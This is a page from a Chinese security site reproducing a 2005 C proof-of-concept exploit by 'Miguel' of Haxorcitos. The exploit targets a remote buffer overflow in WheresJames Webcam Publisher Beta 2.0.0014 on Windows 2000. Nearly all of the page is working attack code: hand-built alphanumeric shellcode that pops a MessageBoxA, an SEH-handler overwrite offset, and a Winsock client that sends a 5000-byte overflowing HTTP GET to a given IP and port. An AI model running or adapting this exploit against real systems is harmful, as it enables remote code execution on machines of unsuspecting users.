首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WheresJames Webcam Publisher Remote Buffer Overflow Exploit
来源:www.Haxorcitos.com 作者:Miguel 发布时间:2005-04-20  

WheresJames Webcam Publisher Remote Buffer Overflow Exploit

/*
* WheresJames Webcam Publisher Beta 2.0.0014 POC (www.wheresjames.com)
*
*
* Bug and Exploit by : Miguel Tarasc?Acu馻 - Haxorcitos.com 2005
* Tarako AT gmail.com - Tarako AT Haxorcitos.com
*
* Platforms tested:
*
* - Windows 2000 SP4 Spanish
* - Probably All Windows 2000 versions
*
*
* Exploit Date: 15/April/2005
*
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Greetings to: #haxorcitos, #dsr and #localhost @efnet
*
*
* Little Explanation:
*
* Buffer must only have bytes between 0x20 and 0x7A, this limits you to use
* a generic shellcode.
* I created a harcoded MessageBoxA alphanumeric Shellcode to run with this POC
* Also the offset referenced by the Call ECX SEH handler overwriten, must contain
* only bytes between 0x20 and 0x7A
*
* 77F69B9F 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18]
* 77F69BA2 FFD1 CALL ECX
*
* stack
* 00000000
* 00000000
* XXXXXXXX <-- EBX points to HERE (XX >= 0x20 && XX <= 0x7A)
* YYYYYYYY <-- This DWORD overwrites the SEH handler (the flow is taken in the CALL ECX)
* 00000000
* 00000000
*
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

#define TIMEOUT 1
#define TOPHEADER "GET "
#define MIDDLEHEADER "\nHost: "
#define BOTTOMHEADER "\nUser-Agent: User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\
Accept: */*\n\
Accept-Language: es\n\
Accept-Encoding: gzip,deflate\n\
Keep-Alive: 100\n\
Connection: keep-alive\r\n\r\n"
#define BUFFERLEN 5000


char shellcode[] = // little harcoded alphanumeric "shellcode"
// haaaaX5aaaaP[H-,F3T--F3U5!@z!ShkitohTaraTZSSRSSP?"\x68\x61\x61\x61\x61" // PUSH 61616161 ;
"\x58" // POP EAX ; EAX = 61616161
"\x35\x61\x61\x61\x61" // XOR EAX,61616161 ; EAX = 00000000
"\x50" // PUSH EAX ;
"\x5B" // POP EBX ; EBX = 00000000
"\x48" // DEC EAX ; EAX = FFFFFFFF
"\x2D\x2C\x46\x33\x54" // SUB EAX,5433462C ; EAX = ABCCB9D3
"\x2D\x2D\x46\x33\x55" // SUB EAX,5533462D ; EAX = 569973A6
"\x35\x21\x40\x7A\x21" // XOR EAX,217A4021 ; EAX = 77E33387 USER32.MessageBoxA (Win2kSP4)
"\x53" // PUSH EBX ;
"\x68\x6B\x69\x74\x6F" // PUSH 6F74696B ; ASCII "kito"
"\x68\x54\x61\x72\x61" // PUSH 61726154 ; ASCII "Tara"
"\x54" // PUSH ESP ;
"\x5A" // POP EDX ; ASCII "Tarakito"
"\x53" // PUSH EBX ; 0
"\x53" // PUSH EBX ; 0
"\x52" // PUSH EDX ; Tarakito
"\x53" // PUSH EBX ; 0
"\x53" // PUSH EBX ; 0
"\x50" // PUSH EAX ; MessageBoxA
"\xC3"; // RETN


struct { char *name; long offset; } supported[] = {
// 0x72712F5E (clbcatq.dll 2000.2.3511.0) -> 83C108 = ADD ECX,8 + FFD1 = CALL ECX
{"Windows 2000 Pro SP4 Spanish", 0x72712F5E },
{"Crash", 0x41414141 }
},VERSIONES;


/******************************************************************************/
void ShowHeader(int argc,char *argv[]) {
int i;
printf("\n WheresJames Webcam Publisher Beta 2.0.0014 Buffer Overflow POC\n");
printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n");

printf("\n Windows Versions:\n");
printf(" ---------------------------------------------\n");
for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
printf(" %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset);
}
printf(" ---------------------------------------------\n\n");
if (argc<4) {
printf(" Usage: %s <IP> <Port> <Option>\n",argv[0]);
exit(1);
exit(1);
}
}
/******************************************************************************/

void main(int argc, char *argv[]) {
SOCKET s;

WSADATA HWSAdata;
struct sockaddr_in sa;

char *buffer=NULL;

ShowHeader(argc,argv);

if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError());
exit(1);
}

if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
exit(1);
}

sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(atoi(argv[2]));
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);

if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("\n [e] Error: connect()");
exit(1);
}

printf(" [i] Connected : Yes\n");
printf(" [i] Target : %s\n",supported[atoi(argv[3])].name);

buffer=(char*)malloc(strlen(TOPHEADER)+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+1+strlen(argv[2])+strlen(BOTTOMHEADER)+1);
memset(buffer,0,sizeof(buffer));

memcpy(buffer,TOPHEADER,strlen(TOPHEADER));

memset(buffer+strlen(TOPHEADER),'A',BUFFERLEN);

memcpy(buffer+strlen(TOPHEADER)+1052,&supported[atoi(argv[3])].offset,sizeof(long));

memcpy(buffer+strlen(TOPHEADER)+1060,shellcode,strlen(shellcode));

memcpy(buffer+BUFFERLEN,MIDDLEHEADER,strlen(MIDDLEHEADER));
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER),argv[1],strlen(argv[1]));
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1]),":",strlen(":"));
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":"),argv[2],strlen(argv[2]));
memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":")+strlen(argv[2]),BOTTOMHEADER,strlen(BOTTOMHEADER));

send(s,buffer,strlen(buffer),0);

printf(" [i] Buffer sent\n\n");

closesocket(s);

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·UBB Threads printthread.php Re
·Multiple Vendor TCP/IP Impleme
·Microsoft Exchange Server Remo
·PMsoftware Mini HTTP Server Re
·PMSoftware Simple Web Server R
·Multiple Exploit Codes for Ora
·PostgreSQL 8.x PL/PgSQL Remote
·ICMP Attacks Against TCP Vulne
·sphpblog多个输入验证漏洞
·BitchX Buffer Overflow
·Explorer.exe WMF Parsing DoS
·phpBB Knowledge Base模块SQL注
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved